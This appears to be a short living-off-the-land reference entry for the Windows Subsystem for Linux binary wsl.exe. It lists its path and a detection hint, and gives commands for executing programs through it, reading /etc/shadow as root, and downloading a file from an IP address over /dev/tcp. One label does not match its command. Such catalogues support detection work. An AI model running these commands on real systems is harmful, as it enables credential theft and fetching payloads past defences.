Windows subsystem for Linux executable

Paths:

C:\Windows\System32\wsl.exe

Detection: Child process from wsl.exe

Execute

Executes calc.exe from wsl.exe

wsl.exe -e /mnt/c/Windows/System32/calc.exe

Cats /etc/shadow file as root

wsl.exe -u root -e cat /etc/shadow

Cats /etc/shadow file as root

wsl.exe --exec bash -c 'cat file'

Download

Downloads file from 192.168.1.10

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'